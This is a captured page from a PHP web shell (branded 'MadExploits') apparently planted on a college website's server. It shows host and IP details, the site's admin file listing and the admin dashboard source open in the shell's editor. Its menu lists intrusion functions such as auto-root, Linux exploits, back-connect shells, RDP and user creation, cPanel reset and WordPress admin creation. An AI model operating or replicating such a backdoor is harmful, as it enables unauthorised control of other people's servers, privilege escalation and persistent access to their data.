Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.15.2.88
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
Admin /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
contact
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
docs
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
ocassion-folder
[ DIR ]
drwxr-xr-x
pages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
product-folder
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxr-xr-x
aboutCollege.php
3.08
KB
-rw-r--r--
adminStaff.php
1.31
KB
-rw-r--r--
docs.php
1.13
KB
-rw-r--r--
dsw.php
1.5
KB
-rw-r--r--
fPrincipal.php
1.45
KB
-rw-r--r--
footer.php
1.89
KB
-rw-r--r--
gBody.php
1.79
KB
-rw-r--r--
header.php
11.56
KB
-rw-r--r--
homeBanner.php
1.44
KB
-rw-r--r--
index.php
1.81
KB
-rw-r--r--
invoice.html
8.32
KB
-rw-r--r--
login.php
3.33
KB
-rw-r--r--
login_process.php
644
B
-rw-r--r--
logout.php
95
B
-rw-r--r--
mCommittee.php
1.55
KB
-rw-r--r--
nTeaching.php
1.96
KB
-rw-r--r--
nep-2020.php
8.17
KB
-rw-r--r--
new_transaction.php
3.64
KB
-rw-r--r--
pAndS.php
1.55
KB
-rw-r--r--
pMessage.php
2.91
KB
-rw-r--r--
proctor.php
1.61
KB
-rw-r--r--
sMessage.php
1.78
KB
-rw-r--r--
slider1.php
3.93
KB
-rw-r--r--
slider2.php
3.55
KB
-rw-r--r--
teaching.php
1.95
KB
-rw-r--r--
updatepass.php
1.52
KB
-rw-r--r--
upload_docs.php
1.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include("include/db.php"); $msg=""; if(!(isset($_SESSION["EMAIL"]))) { header("location:login.php"); } $tot=0; $inc=0; $out=0; $page = "dashboard"; include("header.php"); ?> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <div class="container-fluid"> <div class="row m-2" > <div class="col-lg-4 col-6"> <!-- small box --> <div class="small-box bg-success"> <div class="inner"> <h3>222</h3> <p>Total Students</p> </div> <div class="icon"> <i class="ion ion-stats-bars"></i> </div> <a href="#" class="small-box-footer"><i class="fa fa-money" aria-hidden="true"></i> </a> </div> </div> <div class="col-lg-4 col-6"> <!-- small box --> <div class="small-box bg-info"> <div class="inner"> <h3>211</h3> <p>New Admission</p> </div> <div class="icon"> <i class="ion ion-pie-graph"></i> </div> <a href="incoming.php" class="small-box-footer">More info <i class="fas fa-arrow-circle-right"></i></a> </div> </div> <div class="col-lg-4 col-6"> <!-- small box --> <div class="small-box bg-secondary"> <div class="inner"> <h3>112</h3> <p>Others</p> </div> <div class="icon"> <i class="ion ion-pie-graph"></i> </div> <a href="outgoing.php" class="small-box-footer">More info <i class="fas fa-arrow-circle-right"></i></a> </div> </div> <!--<img src="images/logo.jpg" style="width:100%;">--> </div> </div> <!-- /.content --> </div> <!-- /.content-wrapper --> <?php include("footer.php"); ?>
Close